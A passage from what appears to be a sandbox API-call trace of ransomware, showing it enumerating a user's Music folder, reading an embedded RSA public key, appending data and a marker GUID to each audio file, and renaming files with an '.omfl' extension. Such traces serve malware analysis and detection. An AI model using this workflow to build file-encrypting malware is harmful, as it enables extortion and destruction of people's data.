KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.390] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.391] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.391] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.391] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.391] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.392] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.392] GetLastError () returned 0x0 [0131.392] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.392] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.392] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.392] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.392] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.392] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.392] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.392] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.393] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x6b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.393] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.393] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.393] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.393] CloseHandle (hObject=0x5c8) returned 1 [0131.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.396] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rIfEXNPea6q 7d_rR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rifexnpea6q 7d_rr.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rIfEXNPea6q 7d_rR.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rifexnpea6q 7d_rr.m4a.omfl")) returned 1 [0131.398] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2109f480, ftCreationTime.dwHighDateTime=0x1d5de78, ftLastAccessTime.dwLowDateTime=0x697630f0, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0x697630f0, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x16cf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sP3uX-XbKDQsfXOmiI.wav", cAlternateFileName="SP3UX-~1.WAV")) returned 1 [0131.398] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.398] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.398] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sP3uX-XbKDQsfXOmiI.wav") returned=".wav" [0131.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sP3uX-XbKDQsfXOmiI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sp3ux-xbkdqsfxomii.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.399] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93426) returned 1 [0131.399] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.401] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16ccc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.401] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.402] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x16cf2, lpOverlapped=0x0) returned 1 [0131.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.403] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.404] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.404] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.404] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.404] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.404] GetLastError () returned 0x0 [0131.404] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.404] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.458] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.458] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.458] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.458] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.458] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.458] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.459] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16cf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.459] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.459] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.459] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.459] CloseHandle (hObject=0x5c8) returned 1 [0131.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.465] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sP3uX-XbKDQsfXOmiI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sp3ux-xbkdqsfxomii.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sP3uX-XbKDQsfXOmiI.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sp3ux-xbkdqsfxomii.wav.omfl")) returned 1 [0131.466] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f2b110, ftCreationTime.dwHighDateTime=0x1d5de61, ftLastAccessTime.dwLowDateTime=0x96d28be0, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x96d28be0, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x12e9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trDK_KEdOdJOGP.m4a", cAlternateFileName="TRDK_K~1.M4A")) returned 1 [0131.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\trDK_KEdOdJOGP.m4a") returned=".m4a" [0131.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\trDK_KEdOdJOGP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\trdk_kedodjogp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.466] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=77469) returned 1 [0131.466] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.468] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12e77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.468] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.469] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x12e9d, lpOverlapped=0x0) returned 1 [0131.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.470] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.471] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.471] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.471] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.471] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.471] GetLastError () returned 0x0 [0131.471] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.471] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.471] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.471] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.471] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.472] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.472] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12e9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.472] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.472] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.472] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.473] CloseHandle (hObject=0x5c8) returned 1 [0131.474] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.474] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.474] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\trDK_KEdOdJOGP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\trdk_kedodjogp.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\trDK_KEdOdJOGP.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\trdk_kedodjogp.m4a.omfl")) returned 1 [0131.476] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d3a840, ftCreationTime.dwHighDateTime=0x1d5d7d7, ftLastAccessTime.dwLowDateTime=0x7604e4e0, ftLastAccessTime.dwHighDateTime=0x1d5dea5, ftLastWriteTime.dwLowDateTime=0x7604e4e0, ftLastWriteTime.dwHighDateTime=0x1d5dea5, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UnxFEG-UZAK1.mp3", cAlternateFileName="UNXFEG~1.MP3")) returned 1 [0131.476] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.476] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.476] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UnxFEG-UZAK1.mp3") returned=".mp3" [0131.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UnxFEG-UZAK1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\unxfeg-uzak1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.476] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=47987) returned 1 [0131.476] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.478] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xbb4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.478] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.479] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.479] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xbb73, lpOverlapped=0x0) returned 1 [0131.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.479] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.479] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 